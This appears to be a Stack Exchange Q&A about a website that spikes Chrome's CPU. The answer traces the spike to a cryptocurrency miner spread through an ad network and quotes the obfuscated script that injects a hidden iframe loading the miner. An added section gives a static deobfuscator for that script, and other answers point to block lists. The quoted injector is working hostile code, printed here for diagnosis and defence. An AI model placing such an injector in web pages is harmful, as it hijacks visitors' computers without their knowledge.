89

Whenever I try to visit this particular website, Chrome CPU usage shoots up to at least 75% and my laptop gets way louder. If I close the tab everything goes back to normal.

Windows Task Manager CPU usage

Chrome Task Manager CPU Usage

RAM usage never goes up. My naive guess is the website is trying to mine cryptocurrency. But this happens only if I use Chrome; Edge works normally when I visit this website. The website in question is www.123telugu.com. What could be the reason for this behavior?

doppelgreener
Rohith Reddy

3 Answers

117

Yes, it’s a cryptocurrency miner. Hosted at www.datasecu.download, implemented in WebAssembly, communicating with its host via WebSocket:


It’s distributed using a compromised advertising network:

Extract from https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js

```
var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
```

tl;dr: Use an Adblocker already.

Daniel B
  • 3
    Hmm. uBlock Origin doesn't stop it (on Firefox at least). – DavidPostill Mar 10 '18 at 20:31
  • 5
    [Virustotal](https://www.virustotal.com/#/url/6e62206bfca4ed0d0059aca4534cae00c2ce2c559a6317f14c5c536833a158e4/detection) comes back clean. Does no one classify crypto currency miners on websites as malicious? –  Mar 11 '18 at 01:48
  • heh, that ad network might not even be "compromised", except intentionally. –  Mar 11 '18 at 02:49
  • 7
    @Ploni there are some causes where their use isn't malicious and actually legitimate – Keith M Mar 11 '18 at 03:32
  • 1
    ABP doesn't appear to block it either. – Matthew FitzGerald-Chamberlain Mar 11 '18 at 03:44
  • In the meanwhile, try https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl – Madara's Ghost Mar 11 '18 at 09:51
  • @DanielB: I need to set both "third-party scripts" and "third-party frames" to *neutral* for the adware/malware to work. I have them blocked by default. – David Foerster Mar 11 '18 at 10:05
  • @DavidFoerster Those are certainly sensible choices. However, this isn’t the default configuration, leaving many users vulnerable. That’s why it has to be in the default block lists. – Daniel B Mar 11 '18 at 12:02
  • 4
    I just added `www.datasecu.download` to my adblock filters and it blocks it now. Thanks. – Rohith Reddy Mar 11 '18 at 20:23
  • Semi-deobfuscated version available at https://pastebin.com/6Ys3ihkJ (in a Pastebin because it was otherwise too long) – Solomon Ucko Mar 11 '18 at 21:15
  • 5
    @RonJohn I'd argue that cryptocurrency malware isn't that bad, at least compared to [getting Forbes'd](https://www.techdirt.com/articles/20160111/05574633295/forbes-site-after-begging-you-turn-off-adblocker-serves-up-steaming-pile-malware-ads.shtml). I'd rather have my CPU overused for a couple of minutes than malware installed on my computer. Not at all coincidentally, both are prevented by (a) having a strict adblocker and (b) refusing to make exceptions. – Nic Mar 12 '18 at 06:09
  • 4
    @Ploni Crypto miners are no more malicious than your printed newspaper ad. One taps processing power of your CPU, the other taps processing power of your brain, both do it for the financial gain of its operator. You can close both by closing the page, therefore: "not malicious." – Agent_L Mar 12 '18 at 09:03
  • 1
    **Do keep in mind that comments are not for extended discussion.** You might want to take the question of whether crypto mining in ads is malicious to [chat]. – Daniel B Mar 12 '18 at 09:11
  • 2
    @Agent_L that's debatable, what if someone knew how to access and use your brain without you knowing about it. At least you'd like to know what they are doing. In this case, no warning whatsoever was provided. – CPHPython Mar 12 '18 at 15:19
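
Added example (not part of the original answer or its comments): a static resolver for the string-table obfuscation used in the extract quoted in the answer above, so the injected iframe and its host can be read without running the script. It assumes exactly the layout seen in that extract (one string array, one numeric rotation count, one accessor taking a hex index); the names `deobfuscate` and `urlHosts` are hypothetical.

```javascript
// The extract quoted in the answer above, held as inert text and never evaluated.
const SAMPLE =
  'var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head",' +
  '"appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];' +
  '!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);' +
  'var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};' +
  'a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),' +
  'a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);';

// Resolve the rotated string-table lookups by text rewriting only.
function deobfuscate(src) {
  const arr = /var (_0x[0-9a-f]+)=(\[[^\]]*\]);/.exec(src);
  if (!arr) throw new Error("string array not found");
  const [, arrName, literal] = arr;
  const strings = JSON.parse(literal); // assumption: plain double-quoted strings

  // The rotation IIFE does ++x, then for(;--x;): exactly `count` push(shift()) steps.
  const rot = new RegExp("\\(" + arrName + ",(\\d+)\\)").exec(src);
  const shifts = rot ? Number(rot[1]) % strings.length : 0;
  const table = strings.slice(shifts).concat(strings.slice(0, shifts));

  // The accessor is the function whose body indexes the string array.
  const acc = new RegExp(
    "var (_0x[0-9a-f]+)=function\\([^)]*\\)\\{[^}]*" + arrName + "\\[").exec(src);
  if (!acc) throw new Error("accessor function not found");

  // Inline every accessor("0x..") call; leave out-of-range indexes untouched.
  const call = new RegExp(acc[1] + '\\("(0x[0-9a-f]+)"\\)', "g");
  const resolved = src.replace(call, (m, hex) =>
    Number(hex) < table.length ? JSON.stringify(table[Number(hex)]) : m);
  return { table, resolved };
}

// Hostnames of the http(s) URLs in the string table: candidates for a filter list.
function urlHosts(table) {
  return table.filter((s) => /^https?:\/\//.test(s)).map((s) => new URL(s).hostname);
}

const result = deobfuscate(SAMPLE);
console.log(result.resolved);
console.log("hosts:", urlHosts(result.table));
```

The resolved text shows the script creating an iframe sized 0px by 1px and appending it to the document head, and the reported host is the one the asker added to their filter list.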
9

For uBlock you can load the noCoin filter list: https://github.com/hoshsadiq/adblock-nocoin-list/

This datasecu website is already included.

jho
2

Just disable JavaScript and the website won't be able to use your PC's CPU. If you use Chrome: right click -> inspect element -> network (tab) -> settings -> disable JavaScript.